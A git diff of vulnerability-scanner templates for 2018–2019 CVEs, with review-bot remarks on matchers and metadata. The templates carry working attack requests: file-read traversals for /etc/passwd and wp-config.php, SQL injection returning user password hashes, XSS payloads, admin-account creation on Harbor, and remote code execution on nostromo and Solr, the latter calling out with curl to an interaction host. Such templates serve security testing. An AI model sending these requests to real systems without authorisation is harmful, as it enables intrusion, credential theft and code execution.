@@ -0,0 +1,33 @@ +id: CVE-2018-7700 + +info: + name: DedeCMS V5.7SP2 RCE + author: pikpikcu + severity: high + reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." + +requests: + - method: GET + path: + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + + matchers-condition: and + matchers: + + - type: word + words: + - "phpinfo" + - "PHP Version" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2018-9118-3654.yaml b/poc/cve/cve-2018-9118-3654.yaml deleted file mode 100644 index a56feb3899..0000000000 --- a/poc/cve/cve-2018-9118-3654.yaml +++ /dev/null 
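Review bot: The body word `phpinfo` is already present in the request's `partcode` value, so a page that merely echoes the parameter satisfies it and only `PHP Version` carries signal. I would replace it with a string that only rendered output contains, `- "PHP Extension"`, keeping `- "PHP Version"` and `condition: and`. `reference:` is also a plain scalar here while most templates in this commit use a list; writing it as `reference:` followed by one `- <url>` item keeps the field one type across the collection.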
@@ -1,39 +0,0 @@ -id: CVE-2018-9118 - -info: - name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. - reference: - - https://www.exploit-db.com/exploits/44417 - - https://wpvulndb.com/vulnerabilities/9056 - - https://99robots.com/docs/wp-background-takeover-advertisements/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-9118 - remediation: | - Upgrade to 4.1.15. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-9118 - cwe-id: CWE-22 - tags: cve,cve2018,wordpress,wp-plugin,lfi,traversal,wp - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_HOST" - - "The base configurations of the WordPress" - condition: and - -# Enhanced by mp on 2022/06/15 diff --git "a/poc/cve/cve-2018\342\200\22314064(1).yaml" "b/poc/cve/cve-2018\342\200\22314064(1).yaml" new file mode 100644 index 0000000000..d07fc4a0b2 --- /dev/null +++ "b/poc/cve/cve-2018\342\200\22314064(1).yaml" @@ -0,0 +1,21 @@ +id: cve-2018-14064 +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + reference: | + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + tags: velotismart,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-1010287-3696.yaml b/poc/cve/cve-2019-1010287-3696.yaml new file mode 100644 index 0000000000..b1afc71348 --- /dev/null 
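Review bot: In the added cve-2018-14064 template, `reference: |` turns the two URLs into one block string rather than a list, and the info block has no `description`, no `classification` and no `cve`/`cve2018` tags, so the file presumably drops out of tag- and CVE-based selection. I would remove the `|`, write `id: CVE-2018-14064` in the upper-case form the other files use, and set `tags: cve,cve2018,velotismart,lfi`. The file name carries an en dash and a `(1)` suffix, which looks like a copy artefact worth normalising. The CVE-2019-11013 template added further down has the same gaps (scalar `reference`, `tags: cves,lfi,nimble`).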
+++ b/poc/cve/cve-2019-1010287-3696.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-1010287 +info: + name: Timesheet 1.5.3 - Cross Site Scripting + author: pikpikcu + severity: medium + description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ + - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ + - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"/timesheet/login.php" + tags: cve,cve2019,timesheet,xss +requests: + - raw: + - | + POST /timesheet/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '>' + part: body diff --git a/poc/cve/cve-2019-10692(1).yaml b/poc/cve/cve-2019-10692(1).yaml new file mode 100644 index 0000000000..66751d09e7 --- /dev/null +++ b/poc/cve/cve-2019-10692(1).yaml 
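Review bot: The body matcher word is shown as `'>'`, which almost any HTML response contains; if that is what the file holds rather than a rendering artefact of this page, the template reports every 200 response from `/timesheet/login.php`. The word should be the complete marker that the request sends in `username`, and a header matcher (`part: header`, word `text/html`) as used in CVE-2019-12962 would exclude non-HTML reflections. The added CVE-2019-15713 template shows the same problem with an empty body word `""`, which every response satisfies.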
@@ -0,0 +1,35 @@ +id: CVE-2019-10692 +info: + name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection + author: pussycat0x + severity: critical + description: | + In the wp-google-maps plugin before 7.11.18 for WordPress, + includes/class.rest-api.php in the REST API does not sanitize field names + before a SELECT statement. + reference: + - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + metadata: + verified: true + tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps +requests: + - method: GET + path: + - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"user_login"' + - '"user_pass"' + - '"user_nicename"' + condition: and + - type: word + part: header + words: + - application/json + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-11013-3719.yaml b/poc/cve/cve-2019-11013-3719.yaml new file mode 100644 index 0000000000..ea7a0c390c --- /dev/null +++ b/poc/cve/cve-2019-11013-3719.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-11013 +info: + name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/47301 + tags: cves,lfi,nimble +requests: + - method: GET + path: + - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-11248-3731.yaml b/poc/cve/cve-2019-11248-3731.yaml deleted file mode 100644 index a5875ef6fe..0000000000 --- a/poc/cve/cve-2019-11248-3731.yaml +++ /dev/null 
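Review bot: The CVE-2019-10692 info block has no `classification`, so `severity: critical` stands without a CVSS vector or CWE beside it, unlike most templates added in this commit. I would add `classification:` with `cve-id: CVE-2019-10692` and `cwe-id: CWE-89`, and take the vector from the NVD entry already listed under `reference`. A positive match means the response body carried `user_login` and `user_pass` rows, so a comment such as `# matched responses contain credential hashes; treat scan output as sensitive` belongs next to the matchers.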
@@ -1,37 +0,0 @@ -id: CVE-2019-11248 - -info: - name: Debug Endpoint pprof - Exposure Detection - author: 0xceeb,ritikchaddha - severity: high - description: | - The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. - reference: - - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - - http://mmcloughlin.com/posts/your-pprof-is-showing - - https://github.com/kubernetes/kubernetes/issues/81023 - - https://groups.google.com/d/msg/kubernetes-security-announce/pKELclHIov8/BEDtRELACQAJ - - https://nvd.nist.gov/vuln/detail/CVE-2019-11248 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L - cvss-score: 8.2 - cve-id: CVE-2019-11248 - cwe-id: CWE-862 - tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/debug/pprof/" - - "{{BaseURL}}/debug/pprof/goroutine?debug=1" - - stop-at-first-match: true - matchers: - - type: word - words: - - "Types of profiles available:" - - "Profile Descriptions" - - "goroutine profile: total" - condition: or - -# Enhanced by mp on 2022/06/15 diff --git a/poc/cve/cve-2019-11370(1).yaml b/poc/cve/cve-2019-11370(1).yaml deleted file mode 100644 index 58ffa77862..0000000000 --- a/poc/cve/cve-2019-11370(1).yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2019-11370 -info: - name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field. - reference: - - https://www.exploit-db.com/exploits/46897 - - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370 - - https://nvd.nist.gov/vuln/detail/CVE-2019-11370 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2019-11370 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"pCOWeb" - verified: "true" - tags: cve,cve2019,pcoweb,xss,carel -requests: - - raw: - - | - POST /config/pw_snmp_done.html HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E - - | - GET /config/pw_snmp.html HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "text/html")' - - status_code_2 == 200 - - contains(body_2, 'value=\"\">\">') - condition: and diff --git a/poc/cve/cve-2019-12962(1).yaml b/poc/cve/cve-2019-12962(1).yaml new file mode 100644 index 0000000000..0be257a894 --- /dev/null +++ b/poc/cve/cve-2019-12962(1).yaml 
@@ -0,0 +1,40 @@ +id: CVE-2019-12962 +info: + name: LiveZilla Server 8.0.1.0 - Cross Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + reference: + - https://www.exploit-db.com/exploits/49669 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:LiveZilla + verified: true + tags: cve,cve2019,livezilla,xss +requests: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + headers: + Accept-Language: ';alert(document.domain)//' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-13101-3802.yaml b/poc/cve/cve-2019-13101-3802.yaml deleted file mode 100644 index fc313615ee..0000000000 --- a/poc/cve/cve-2019-13101-3802.yaml +++ /dev/null 
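Review bot: `author: Clment Cruchet` looks like it lost a non-ASCII character in transit (presumably `Clément`); the file should be saved as UTF-8 and the name restored from the upstream template. The `description` only repeats the title. One sentence naming what the matchers rely on, that `mobile/index.php` reflects the `Accept-Language` header into `var detectedLanguage`, would let a reader judge a finding without opening the references.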
@@ -1,37 +0,0 @@ -id: CVE-2019-13101 - -info: - author: Suman_Kar - name: D-Link DIR-600M Authentication Bypass - description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. - severity: critical - reference: - - https://github.com/d0x0/D-Link-DIR-600M - - https://www.exploit-db.com/exploits/47250 - - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-13101 - cwe-id: CWE-306 - tags: cve,cve2019,dlink,router,iot - -requests: - - raw: - - | - GET /wan.htm HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "/PPPoE/" - part: body - -# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/cve-2019-14251(1).yaml b/poc/cve/cve-2019-14251(1).yaml new file mode 100644 index 0000000000..9b1fec3938 --- /dev/null +++ b/poc/cve/cve-2019-14251(1).yaml 
@@ -0,0 +1,31 @@ +id: CVE-2019-14251 +info: + name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + author: 0x_Akoko + severity: high + description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + reference: + - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt + - https://www.cvedetails.com/cve/CVE-2019-14251 + - https://vuldb.com/?id.146815 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-14251 + cwe-id: CWE-22 + tags: cve,cve2019,temenos,lfi,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" + - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-15713-3887.yaml b/poc/cve/cve-2019-15713-3887.yaml new file mode 100644 index 0000000000..052732aa1e --- /dev/null +++ b/poc/cve/cve-2019-15713-3887.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2019-15713 + +info: + name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo,dhiyaneshDk + severity: medium + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-16097.yaml b/poc/cve/cve-2019-16097.yaml deleted file mode 100644 index ac225380ac..0000000000 --- a/poc/cve/cve-2019-16097.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2019-16097 - -info: - name: Harbor <=1.82.0 - Privilege Escalation - author: pikpikcu - severity: medium - description: Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration. - remediation: Upgrade to v1.7.6 v1.8.3. v.1.9.0 or higher. A potential workaround without applying the fix is to configure Harbor to use a non-DB authentication backend such as LDAP. - reference: - - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - - https://github.com/goharbor/harbor/issues/8951 - - https://nvd.nist.gov/vuln/detail/CVE-2019-16097 - - https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517 - - http://www.vmware.com/security/advisories/VMSA-2019-0015.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2019-16097 - cwe-id: CWE-862 - epss-score: 0.96909 - epss-percentile: 0.99643 - cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: linuxfoundation - product: harbor - tags: cve,cve2019,intrusive,harbor - -http: - - method: POST - path: - - '{{BaseURL}}/api/users' - - body: | - {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"} - - headers: - Content-Type: application/json - - matchers-condition: and - matchers: - - type: word - part: response - words: - - "username has already been used" - - "Location: /api/users/" - condition: or - - - type: status - status: - - 201 - - 409 - condition: or -# digest: 
4a0a00473045022100fce7a3f7a8a74bd39e0dac87eef7626ba3e8145472cb383a24537447f304dfeb022077620294cd6e60f810fb50ed0c3a2e8d878e6f96116a7ba5f47bbfe3f800a7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-16123-3918.yaml b/poc/cve/cve-2019-16123-3918.yaml deleted file mode 100644 index 5868d97896..0000000000 --- a/poc/cve/cve-2019-16123-3918.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-16123 -info: - name: PilusCart <= 1.4.1 - Local File Disclosure - author: 0x_Akoko - severity: high - description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. - reference: - - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - - https://www.cvedetails.com/cve/CVE-2019-16123 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-16123 - cwe-id: CWE-22 - tags: cve,cve2019,piluscart,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-16278.yaml b/poc/cve/cve-2019-16278.yaml new file mode 100644 index 0000000000..a51ac4cd0f --- /dev/null +++ b/poc/cve/cve-2019-16278.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2019-16278 + +info: + name: nostromo 1.9.6 - Remote Code Execution + author: pikpikcu + severity: critical + description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify. + remediation: | + Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch. + reference: + - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html + - https://www.exploit-db.com/raw/47837 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16278 + - http://www.nazgul.ch/dev/nostromo_cl.txt + - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + epss-score: 0.97359 + epss-percentile: 0.99879 + cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: nazgul + product: nostromo_nhttpd + tags: edb,cve,cve2019,rce,packetstorm + +http: + - raw: + - | + POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 + Host: {{Hostname}} + + echo + echo + cat /etc/passwd 2>&1 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" +# digest: 490a0046304402202b368315a7a4c61659ca398d0f26e81ad5b9729a83f04c71b63ae9001a5d3a290220262d6b09a67529c0cd9550eecbee39eb90512b98a85355d3192d2d57cbb29814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-16931(1).yaml b/poc/cve/cve-2019-16931(1).yaml deleted file mode 100644 index 7cccc93c52..0000000000 --- a/poc/cve/cve-2019-16931(1).yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2019-16931 -info: - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) - author: ritikchaddha - severity: medium - description: | - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. - reference: - - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wpvulndb.com/vulnerabilities/9893 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-16931 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth -requests: - - raw: - - | - POST /wp-json/visualizer/v1/update-chart HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"success":"Chart updated"}' - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-17418-3981.yaml b/poc/cve/cve-2019-17418-3981.yaml deleted file mode 100644 index 86a6c43174..0000000000 --- a/poc/cve/cve-2019-17418-3981.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2019-17418 -info: - name: MetInfo 7.0 - SQL Injection - author: ritikchaddha - severity: high - description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 - - https://github.com/evi1code/Just-for-fun/issues/2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2019-17418 - cwe-id: CWE-89 - tags: metinfo,sqli,cve,cve2019 -requests: - - method: GET - path: - - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "43865094559" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2019-17558.yaml b/poc/cve/cve-2019-17558.yaml new file mode 100644 index 0000000000..6009bff30d --- /dev/null +++ b/poc/cve/cve-2019-17558.yaml 
@@ -0,0 +1,74 @@ +id: CVE-2019-17558 + +info: + name: Apache Solr <=8.3.1 - Remote Code Execution + author: pikpikcu,madrobot + severity: high + description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user). + remediation: | + Upgrade to a patched version of Apache Solr (8.4.0 or later) to mitigate this vulnerability. 
+ reference: + - https://issues.apache.org/jira/browse/SOLR-13971 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 + - https://lists.apache.org/thread.html/rb964fe5c4e3fc05f75e8f74bf6b885f456b7a7750c36e9a8045c627a@%3Cissues.lucene.apache.org%3E + - http://packetstormsecurity.com/files/157078/Apache-Solr-8.3.0-Velocity-Template-Remote-Code-Execution.html + - https://lists.apache.org/thread.html/r0b7b9d4113e6ec1ae1d3d0898c645f758511107ea44f0f3a1210c5d5@%3Cissues.lucene.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2019-17558 + cwe-id: CWE-74 + epss-score: 0.97507 + epss-percentile: 0.9998 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: apache + product: solr + tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast + +http: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + - | + POST /solr/{{core}}/config HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } + } + - | + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 200 + + extractors: + - type: regex + 
name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + internal: true + +# digest: 4b0a00483046022100d95ae2fde11c073cfb8300dbe88398c8516603bb4a679c01eadd13c285c3934c02210095bb54e1c435ffb3f579c033627a1769da0f8a3db882b32e06bbf44deea77ba3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/cve-2019-18394.yaml b/poc/cve/cve-2019-18394.yaml new file mode 100644 index 0000000000..2d4a346a78 --- /dev/null +++ b/poc/cve/cve-2019-18394.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-18394 + +info: + name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery + author: pdteam + severity: critical + description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery. + remediation: | + Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability. + reference: + - https://swarm.ptsecurity.com/openfire-admin-console/ + - https://github.com/igniterealtime/Openfire/pull/1497 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18394 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-18394 + cwe-id: CWE-918 + epss-score: 0.62096 + epss-percentile: 0.97508 + cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: igniterealtime + product: openfire + tags: cve,cve2019,ssrf,openfire,oast + +http: + - method: GET + path: + - "{{BaseURL}}/getFavicon?host=http://oast.fun/" + + matchers: + - type: dsl + dsl: + - "contains(body, 'Interactsh Server')" + - status_code == 200 + condition: and +# digest: 490a00463044021f6d7e17f12fe0eb1730678df5edf2c67e717ec04d9aa5a6dfbb92db8b070e2f022100ad3ee2b55fe5ed29b216985b0573dfc038ab42a6df84cdbed73538e789bb33a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-18665(1).yaml b/poc/cve/cve-2019-18665(1).yaml new file mode 100644 index 0000000000..36b4018e5a --- /dev/null 
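Review bot: The second raw request rewrites the target core's configuration (`update-queryresponsewriter` with `"params.resource.loader.enabled": "true"`) and nothing in the template restores it, so every scanned host is left with the parameter template loader switched on, the setting the description itself says is disabled by default. The tags line should carry `intrusive`, as the strapi template in this commit does: `tags: kev,packetstorm,cve,cve2019,apache,rce,solr,oast,intrusive`. I would also put a comment above the POST, `# changes the core's config on the target; revert the velocity response writer after the scan`. Separately, the description has unbalanced backticks around `velocity/` and `params.resource.loader.enabled`.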
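Review bot: The path hard-codes a shared public host, `host=http://oast.fun/`, and the DSL matcher depends on that host's landing-page text (`'Interactsh Server'`), so a result cannot be tied to this scan and the check silently stops matching if the page wording changes or egress to that one domain is blocked. The Solr template in the same commit already uses the per-scan placeholder; the same here would be `- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"` with a word matcher on `part: interactsh_protocol`. The file also ends without a trailing newline.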
